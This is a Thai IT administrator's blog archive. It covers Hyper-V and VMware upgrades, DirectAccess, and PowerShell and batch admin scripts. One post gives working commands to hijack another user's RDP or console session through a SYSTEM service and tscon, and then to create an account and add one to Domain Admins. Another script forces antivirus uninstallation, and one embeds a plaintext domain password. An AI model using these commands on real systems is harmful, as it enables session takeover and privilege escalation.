วันพฤหัสบดีที่ 13 กรกฎาคม พ.ศ. 2560

Upgrade Hyper-V Cluster 2012 R2 to 2016


Upgrade Hyper-V Cluster 2012 R2 to 2016

          วันนี้ผมจะมาพูดถึงการ Migrate Hyper-V Cluster จาก 2012 R2 ไปเป็น 2016 กันนะครับ ซึ่งถือว่าค่อนข้างง่ายจากเดิมเยอะเลย โดยขั้นตอนต่างๆมีดังนี้ครับ





0. แนะนำก่อนที่จะทำการ Migrate ให้ Backup ไว้ก่อนนะครับ
1. ตรวจสอบก่อนนะครับว่า Hyper-V Cluster ของท่านก่อนจะทำการ Migrate มีเพียงพอหรือไม่ (เนื่องจากจะต้องทำการ Install Windows Server ใหม่ ทำให้ Hyper-V Cluster ของท่านจะหายไป 1 Node นั่นเองครับ)
2. เมื่อตรวจสอบแล้ว Resource พอท่านก็สามารถที่จะ Fail Over VM จาก Node ที่ท่านต้องการทำการ Install Windows Server 2016 ได้เลยและทำการ Evict Node ออกครับ
3. เมื่อ Evict Node ออก เรียบร้อยก็สามารถนำ Node นั้นมาติดตั้ง Windows Server 2016 ครับ
4. ติดตั้ง Windows Server 2016 เสร็จแล้วก็มาติดตั้ง Role Hyper-V & Feature Fail Over Cluster ต่อครับ
5. Add Node เข้ามาเป็น สมาชิกใน Cluster Group เดิมครับ
6. ย้าย VM ที่เกาะ Node ที่เป็น Windows Server 2012 R2 มาเกาะ Node ที่เป็น Windows Server 2016 แทนครับ
7. ทำการ Evict Node Windows Server 2012 R2 และทำการติดตั้ง Windows Server 2016 ครับ
8. ติดตั้ง Windows Server 2016 เสร็จแล้วก็มาติดตั้ง Role Hyper-V & Feature Fail Over Cluster ต่อครับ
9. Add Node เข้ามาเป็น สมาชิกใน Cluster Group เดิมครับ (ในที่นี้ก็จะได้ Hyper-V Cluster 2016 ครับ แต่ว่า VM ยังคงเป็น Version เดิมของ 2012 R2) ให้ทำการ Update VM ให้ Support เวอร์ชั่น 2016 ครับ (* การจะ Update VM Version นั้น VM ต้อง Shutdown)
10. ทำการ Shutdown VM และ Update VM Version ครับ

เมื่อเสร็จสิ้นกระบวนการหมดแล้วท่านก็จะได้ Hyper-V Cluster 2016 ซึ่ง VM ก็ Support Feature 2016 ด้วย ตามภาพครับ















วันพุธที่ 12 กรกฎาคม พ.ศ. 2560

Direct Access Solution

Direct Access Solution


          วันนี้จะมาพูดถึง Solution Direct Access กันนะครับ แต่ก่อนที่จะพูดจะขออธิบายให้ฟังกันก่อนนะครับ ว่า Direct Access นั้นคืออะไร และมีไว้ทำไมกันนะครับ
          Direct Access นั้นคือ Solution ที่เข้ามาช่วยให้คุณไม่ว่าจะอยู่ที่ไหนก็ได้ สามารถใช้งาน ทรัพยากรต่างๆภายในองค์กรได้ เสมือนว่าคุณทำงานอยู่ในองค์กรนั้นจริงๆ โดยที่ขอแค่คุณเชื่อมต่อ อินเทอร์เน็ต นั่นเอง คุณอาจเริ่มสงสัยแล้วละสิว่า มันแต่ต่างกันกับ VPN ยังไง ซึ่งสิที่ทำให้ Direct Access นั้นน่าสนใจมากกว่า VPN มีดังนี้ครับ
1. Direct Access นั้นไม่ต้อง Download Tools มาติดตั้งที่ฝั่ง Client (เงื่อนไขขอแค่ คุณมี อินเทอร์เน็ตเปิดเครื่อง Login User จาก AD คุณก็สามารถใช้งานได้แล้ว)
2. Direct Access นั้นค่อนข้างที่จะปลอดภัยกว่า VPN เนื่องด้วยมีการตรวจสอบสิทธิ์การเข้าใช้งานถึง 2 ชั้น [User Authentication & Certificate (Some Thing You Know and Some Thing You Have)] และยังเข้ารหัสการเชื่อมต่อได้ถึงปลายทางที่ติดต่อ ทำให้ปลอดภัยจากการโดนดักขโมยข้อมูล
3. Direct Access นั้นยังช่วยในเรื่องที่เมื่อองค์กรของคุณนั้นมีการ แก้ไข Group Policy ใหม่ทำให้เครื่องที่มีการในไปใช้งานนอกองค์กรนั้น ไม่สามารถรับ Policyได้ ซึ่ง VPN นั้นไม่สามารถทำได้ครับ  แต่ถ้ามีการใช้งาน Direct Access คุณก็ไม่ต้องกังวลเรื่องนั้นได้เลยครับ



วันพฤหัสบดีที่ 6 กรกฎาคม พ.ศ. 2560

Scripts Power Shell : Send Message to Another Computer

Scripts Power Shell : Send Message to Another Computer

          สวัสดีครับวันนี้ผมจะมาพูดถึงการส่ง Pop up ข้อความไปยังเครื่องปลายทางกันครับ ไว้เป็นอีกหนึ่งทางเลือกในการติดต่อกับ User ครับ



###-----------------------------------------------------------###
###--------Author : Mr.Yingkamol Prukrattanakul----###
###---MCP, MCSA, MCSE, MCT, MCST, SEC+----###
###------Email<yingkamol_7@hotmail.com>--------###
###----------------------------------------------------------###
###/////////////////////////////..........\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\###
###///////////////////////////////......\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\###


Invoke-WmiMethod ` -Path Win32_Process ` -Name Create ` -ArgumentList "msg * ..Message..." `
-ComputerName computer.contoso.com -Credential username@contoso.com

Scripts Command Line: Hijack RDP&Console Session and New Account Domain Admin

Scripts Command Line: Hijack RDP Session and New Account Domain Admin

          สำหรับวันนี้ก็จะเป็น Code Hijack กันนะครับ (ถ้าจะลองแนะนำให้ทำแค่ Environment TEST) ซึ่งเงื่อนไขมีอยู่ว่า เราจะต้องเข้าเครื่องเป้าหมายให้ได้ก่อน ไม่ว่าจะด้วย USER อะไรก็ตามและทำการตรวจสอบว่า เครื่องเป้าหมายเรานั้นมีคน Remote เข้ามาใช้งานร่วมด้วยหรือไม่ครับ ถ้ามีเราก็สามารถที่จะ สวมตัวตนเป็นเขาแทนได้ทันทีเลย [เพิ่มเติมในที่นี้ ถ้า USER ที่ Remote เข้ามามีสิทธิ์พอ เช่น Domain Admin, Enterprise Admin) ท่านก็สามารถนำ User เขามาสร้าง Account สำหรับตัวท่านเองและกำหนดสิทธิ์ให้ตัวเองได้ทันทีเลยครับ] ยังไงก็ตรวจสอบให้ดีก่อนจะใช้งานกันนะครับ

###-----------------------------------------------------------###
###--------Author : Mr.Yingkamol Prukrattanakul----###
###---MCP, MCSA, MCSE, MCT, MCST, SEC+----###
###------Email<yingkamol_7@hotmail.com>--------###
###----------------------------------------------------------###
###/////////////////////////////..........\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\###
###/////////////////////////Hijack RDP\\\\\\\\\\\\\\\\\\\\\\\\\\\###



wmic computersystem get domain

query user

sc create sesshijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#46"

net start sesshijack

---------

whoami

net user xxx supersecretPassw0rd /add /dom

net group "domain admins" nopernik /add /dom


###-----------------------------------------------------------###
###--------Author : Mr.Yingkamol Prukrattanakul----###
###---MCP, MCSA, MCSE, MCT, MCST, SEC+----###
###------Email<yingkamol_7@hotmail.com>--------###
###----------------------------------------------------------###
###/////////////////////////////..........\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\###
###//////////////////////Hijack Console \\\\\\\\\\\\\\\\\\\\\\\\###

query user

psexec -s \\localhost cmd

whoami

tscon 1 /dest:console

Scripts Power Shell :Loop For Check User last logon


Scripts Power Shell :Loop For Check User use Computer


###-----------------------------------------------------------###
###--------Author : Mr.Yingkamol Prukrattanakul----###
###---MCP, MCSA, MCSE, MCT, MCST, SEC+----###
###------Email<yingkamol_7@hotmail.com>--------###
###----------------------------------------------------------###
###/////////////////////////////..........\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\###
###///////////////////////////////......\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\###

function GetUserUseComputer

{
$computers = Get-Content D:\IPlist.csv
$ondate = get-date -Format "ddMMyy"



ForEach ($computer in $computers)
{

  try
    {
Get-WmiObject –ComputerName $computer –Class Win32_ComputerSystem | Select-Object Name,UserName
}

catch    
{
            $NOTCONNECT= "System NOPATCH:$computer"
            $NOTCONNECT| Write-Warning
            $NOTCONNECT>> "$env:USERPROFILE\Desktop\NOTCONNECT.txt"

    }
}

}


GetUserUseComputer> "$env:USERPROFILE\Desktop\GetUserUseComputer$ondate.txt"

Scripts Power Shell :Loop For Check Open Port

Scripts Power Shell :Loop For Check Open Port 


###-----------------------------------------------------------###
###--------Author : Mr.Yingkamol Prukrattanakul----###
###---MCP, MCSA, MCSE, MCT, MCST, SEC+----###
###------Email<yingkamol_7@hotmail.com>--------###
###----------------------------------------------------------###
###/////////////////////////////..........\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\###
###///////////////////////////////......\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\###

function CheckPort
   {
            # Define every server IP you need to test:
            $servers = Get-Content D:\IPlist.csv
            # Define the port number you need to test (eg: 3389 for RDP):
            $portToCheck = '3389'
            $ErrorActionPreference = 'Stop'
                foreach ($server in $servers)
                    {
                        If ( Test-Connection $server -Count 1 -Quiet)
                        {  
                        try
                            {    
                            $null = New-Object System.Net.Sockets.TCPClient -ArgumentList $server,$portToCheck
                            $props = @{
                            Server = $server
                            PortOpen = 'Yes'
                                      }
                            }                            
                        catch
                            {
                            $props = @{
                            Server = $server
                            PortOpen = 'No'
                                      }
                            }
                        }
    Else
        {      
            $props = @{
            Server = $server
            PortOpen = 'Server did not respond to ping'        
                      }
        }
    New-Object PsObject -Property $props
        }
   }
CheckPort > "$env:USERPROFILE\Desktop\CheckPort.csv"

Scripts Power Shell :Loop For Check Install KB

Scripts Power Shell :Loop For Check Install KB 

          เนื่องจากมีลูกค้าต้องการเช็คว่า ผู้ใช้งานของลูกค้าเองมีจำนวนมาก และยังขาด Tools ที่เข้ามาช่วยในการบริหารจัดการ หรือถึงไม่สามารถบริหารจัดการได้ทั่วถึง แต่ลูกค้าต้องการทราบข้อมูล ในช่วงที่มี Ransomware WannaCry ว่ามีคอมพิวเตอร์เครื่องไหนที่ Update Patch ไปแล้วบ้าง เลยทำการเขียน Scripts ไว้เพื่อทำการกวาดข้อมูลของเครื่องผู้ใช้งาน ของลูกค้าเองครับ



###-----------------------------------------------------------###
###--------Author : Mr.Yingkamol Prukrattanakul----###  
###---MCP, MCSA, MCSE, MCT, MCST, SEC+----###
###------Email<yingkamol_7@hotmail.com>--------###
###----------------------------------------------------------###
###/////////////////////////////..........\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\###
###///////////////////////////////......\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\###



function Hotfixreport
    {
$computer = Get-Content D:\IPlist.csv
$MS17010= 'KB4012598', #Windows XP, Vista, Server 2003, 2008
               'KB4018466', #Server 2008
               'KB4012212', 'KB4012215', 'KB4015549', 'KB4019264', #Windows 7, Server 2008 R2
               'KB4012214', 'KB4012217', 'KB4015551', 'KB4019216', #Server 2012
               'KB4012213', 'KB4012216', 'KB4015550', 'KB4019215', #Windows 8.1, Server 2012 R2
               'KB4012606', 'KB4015221', 'KB4016637', 'KB4019474', #Windows 10
               'KB4013198', 'KB4015219', 'KB4016636', 'KB4019473', 'KB4016871', #Windows 10 1511
               'KB4013429', 'KB4015217', 'KB4015438', 'KB4016635', 'KB4019472' #Windows 10 1607, Server 2016
$ErrorActionPreference = 'Stop'


ForEach ($computer in $computers)

         {

        try
            {

            $PATCH = Get-HotFix -cn $computer  | out-string -stream | select-string -pattern $MS17010
            $PATCH  >> "$env:USERPROFILE\Desktop\PATCH.txt"
            }

        catch

            {
            $NOPATCH = "System NOPATCH:$computer"
            $NOPATCH | Write-Warning
            $NOPATCH >> "$env:USERPROFILE\Desktop\NOPATCH.txt"
            }
         
        }

    }
Hotfixreport > "$env:USERPROFILE\Desktop\Hotfixreport.txt"

Scripts Power Shell: Create .exe file for join domain

Scripts Power Shell: Create .exe file for join domain


1. สร้าง Script

File Name -> JoinDomain.ps1

###-----------------------------------------------------------###  
###--------Author : Mr.Yingkamol Prukrattanakul----###    
###---MCP, MCSA, MCSE, MCT, MCST, SEC+----###  
###------Email<yingkamol_7@hotmail.com>--------###  
###----------------------------------------------------------###  
###/////////////////////////////..........\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\###  
###///////////////////////////////......\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\###  

$domain = "contoso.local"
$password = "password" | ConvertTo-SecureString -asPlainText -Force
$username = "contoso\username"
$credential = New-Object System.Management.Automation.PSCredential($username,$password)
Add-Computer -DomainName $domain -Credential $credential

2. Download และติดตั้งไฟล์สำหรับแปลง PowerShell Scripts เป็น exe file

Download
อ้างอิง

3. แตกไฟล์ แล้ว สร้าง PowerShell Scripts มา แปลง

.\ps2exe.ps1 -inputfile C:\Users\XXX\Desktop\JoinDomain.ps1
-outputfile C:\Users\XXX\Desktop\JoinDomain.exe



Scripts Command Line: Install and Uninstall Trend Micro Office Scan Agent by Scripts

Scripts Command Line: Install and Uninstall Trend Micro Office Scan Agent by Scripts


          สวัสดีครับ วันนี้จะมาพูดถึง Scripts การ Install and Uninstall Trend Micro Office Scan Agent กันนะครับ เนื่องจาก มีลูกค้า ถามมาเรื่องการที่จะจัดการการในการติดตั้ง Trend Micro Office Scan ว่าสามารถทำอย่างไรได้บ้าง เพราะลูกค้านั้นมีจำนวน Computer ค่อนข้างมาก และยังไม่ได้มี Tools ที่จะใช้บริหารจัดการ Client อย่างเต็มที่ด้วย รวมถึงด้วยว่าการที่ ให้ผู้ใช้งานของลูกค้าเอง Uninstall Trend Micro Office Scan ผ่าน Control Panel แล้วติดปัญหากัน ไม่ว่าจะเป็นลบออกไม่หมดบ้าง (ติด Registry) ลบแล้วติด Password บ้าง ก็เลยได้มีการจัดเตรียม Scripts ไว้เพื่อให้ User สามารถทำการได้เอง (อันนี้เป็น Code ตัวอย่างคร่าวๆนะครับ ยังไงก็ลองเอาไปปรับใช้กันดูครับ)

:Menu

echo 1.  Uninstall TrendMicro.
echo 2.  Install TrendMicro.
echo 9.  Exit

set /p choice= Please Select Menu:
if %choice%==1 GOTO UninstallTrendMicro
if %choice%==2 GOTO InstallTrendMicro
if %choice%==9 GOTO Exit

if %choice%==null GOTO Exit

rem *************************************************************

:Exit

exit

:UninstallTrendMicro
cls
echo 1.  Uninstall TrendMicro on Windows 32bit
echo 2.  Uninstall TrendMicro on Windows 64bit

echo 9.  Menu

set /p UninstallTrendMicroChoice= Please Select Menu:
if %UninstallTrendMicroChoice%==1 GOTO UninstallTrendMicrox86
if %UninstallTrendMicroChoice%==2 GOTO UninstallTrendMicrox64
if %UninstallTrendMicroChoice%==9 GOTO Menu

if %UninstallTrendMicroChoice%==null GOTO Exit

:UninstallTrendMicrox86
"%programfiles%\Trend Micro\OfficeScan Client\pccntmon" -n
ping 1.1.1.1 -n 1 -w 5000>null
reg add HKEY_LOCAL_MACHINE\SOFTWARE\TrendMicro\PC-cillinNTCorp\CurrentVersion\Misc. /v "Allow Uninstall" /t REG_DWORD /d 1 /f

"%programfiles%\Trend Micro\OfficeScan Client\NTRmv.exe"

echo *************************************************************

set /p afterUninstallTrendMicrox86= Do you Want to use other menu? [Y/N]?
if /i "%afterUninstallTrendMicrox86%" EQU "Y" GOTO :Menu
if /i "%afterUninstallTrendMicrox86%" EQU "N" GOTO :Exit


:UninstallTrendMicrox64
"%programfiles(x86)%\Trend Micro\OfficeScan Client\pccntmon" -n
ping 1.1.1.1 -n 1 -w 5000>null
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432node\TrendMicro\PC-cillinNTCorp\CurrentVersion\Misc. /v "Allow Uninstall" /t REG_DWORD /d 1 /f
"%programfiles(x86)%\Trend Micro\OfficeScan Client\NTRmv.exe"

echo *************************************************************

set /p afterUninstallTrendMicrox64= Do you Want to use other menu? [Y/N]?
if /i "%afterUninstallTrendMicrox64%" EQU "Y" GOTO :Menu
if /i "%afterUninstallTrendMicrox64%" EQU "N" GOTO :Exit


:InstallTrendMicro
cls
echo 1.  InstallTrendMicro on Windows 32bit
echo 2.  InstallTrendMicro on Windows 64bit
echo 9.  Menu

set /p InstallTrendMicroChoice= Please Select Menu:
if %InstallTrendMicroChoice%==1 GOTO InstallTrendMicrox86
if %InstallTrendMicroChoice%==2 GOTO InstallTrendMicrox64
if %InstallTrendMicroChoice%==9 GOTO Menu
if %InstallTrendMicroChoice%==null GOTO Exit

:InstallTrendMicrox86
cls
echo 0. Manu
echo 1. Contoso_HQ_01


set /p InstallTrendMicroChoice= Please Select Menu:
if %InstallTrendMicroChoice%==0 GOTO Menu

if %InstallTrendMicroChoice%==1 GOTO Contoso_HQ_01x86

:Contoso_HQ_01x86
msiexec /i http://Contoso_HQ_01:8080/officescan/download/agent_cloud_x86.msi PROPERTY=VALUE
echo *************************************************************
set /p afterContoso_HQ_01x86= Do you Want to use other menu? [Y/N]?
if /i "%afterContoso_HQ_01x86%" EQU "Y" GOTO :Menu
if /i "%afterContoso_HQ_01x86%" EQU "N" GOTO :Exit


:InstallTrendMicrox64
cls
echo 0. Manu
echo 1. Contoso_HQ_01

set /p InstallTrendMicroChoice= Please Select Menu:
if %InstallTrendMicroChoice%==0 GOTO Menu

if %InstallTrendMicroChoice%==1 GOTO Contoso_HQ_01x86

:Contoso_HQ_01x64
msiexec /i http://Contoso_HQ_01:8080/officescan/download/agent_cloud_x64.msi PROPERTY=VALUE
echo *************************************************************
set /p afterContoso_HQ_01x64= Do you Want to use other menu? [Y/N]?
if /i "%afterContoso_HQ_01x64%" EQU "Y" GOTO :Menu
if /i "%afterContoso_HQ_01x64%" EQU "N" GOTO :Exit

วันพุธที่ 5 กรกฎาคม พ.ศ. 2560

Update VMWare ESX 5.1 to 5.5 use VCenter 5.5

Upgrade VMWare ESX 5.1 to 5.5 use VCenter 5.5


          วันนี้ผมจะมาพูดถึงการ Update VMWare ESX จาก เวอร์ชั่น 5.1 ไปยัง 5.5 โดยใช้ VCenter 5.5 ในการจัดการนะครับ สำหรับคนที่ต้องการ Update VMWare ESX จาก เวอร์ชั่น 4.1 ไปยัง 5.5 สามารถดูได้จาก คลิก ซึ่งผมได้ทำไว้เรียบร้อยแล้วครับ โดยการ Update VMWare ESX จาก เวอร์ชั่น 5.1 ไปยัง 5.5 นั้นไม่มีความต้องการอะไรเพิ่มเติม ท่านจึงสามารถที่จะทำการ Upgrade ได้เลยครับ โดยวิธีการคร่าวๆจะมีดังนี้ครับ


          1. Scan Host ว่าพร้อมที่จะทำการ Upgrade Baseline ESX 5.5 หรือไม่ครับ
          2. Remediate Host และเลือก Upgrade Baseline ESX 5.5


Upgrade Baseline VMWare ESX 5.1 to 5.5





Upgrade VMWare ESX 4.1 to 5.5 use VCenter 5.5


Upgrade VMWare ESX 4.1 to 5.5 use VCenter 5.5

          วันนี้ผมจะมาพูดถึงการ Update VMWare ESX จาก เวอร์ชั่น 4.1 ไปยัง 5.5 โดยใช้ VCenter 5.5 ในการจัดการนะครับ สาเหตุที่มาพูดเรื่องนี้ในวันนี้ เนื่องจากมีลูกค้ามาถามผม เรื่องการ Update VMWare ESX ว่าสามารถทำได้หรือไม่ครับ เพราะจำนวน VMWare ESX ของลูกค้านั้น ค่อยข้างมาก รวมถึงสถานที่ตั้งแต่ละเครื่องนั้นค่อนข้างห่างกันมาก ผมจึงได้เสนอให้ใช้ VCenter มาเป็นตัวช่วยในการบริหารจัดการเรื่องการ Update VMWare ESX ครับ

          ก่อนอื่นเลยท่านจะต้องทำการติดตั้ง VCenter รวมถึงติดตั้ง Tools ที่ชื่อว่า VCenter Update Manager เพิ่มด้วยครับ เพื่อใช้ในการ Update VMWare ESX ซึ่งในการ Update VMWare ESX จาก 4.1 มายัง 5.5 นั้น มีความต้องการเพิ่มเติมด้วย ซึ่งท่านจะต้องทำก่อน ถึงจะสามารถ Update VMWare ESX 4.1 เป็น VMWare ESX 5.5 ได้ครับ โดยความต้องการมีดังนี้

          1.  Update Patch  Baseline (Security) เนื่องจาก VMWare ESX 5.5 นั้นมีการเปลี่ยนแปลงเรื่องการเข้ารหัส Password เลยทำให้ต้องทำการ Update Patch  Baseline (Security)  ด้วย
          2.  เมื่อทำการ Update Patch  Baseline (Security)  เสร็จเรียบร้อยแล้ว ท่านก็สามารถ Upgrade Baseline จาก VMWare ESX 4.1 to 5.5 ซึ่งผมได้มีภาพประกอบ คร่าวๆ ตามด้านล่างนี้ครับ

          เมื่อพูดถึงความต้องการแล้ว ผมจะมาพูดถึงวิธีการครับ โดยวิธีการคร่าวๆจะมีดังนี้ครับ

          1. Scan Host ว่าพร้อมที่จะทำการ Update Baseline (Security) หรือไม่ครับ
          2. Remediate Host และเลือก Security Baseline
          3. Scan Host ว่าพร้อมที่จะทำการ Upgrade Baseline ESX 5.5 หรือไม่ครับ
          4. Remediate Host และเลือก Upgrade Baseline ESX 5.5


Update Patch  Baseline (Security)








Upgrade Baseline VMWare ESX 4.1 to 5.5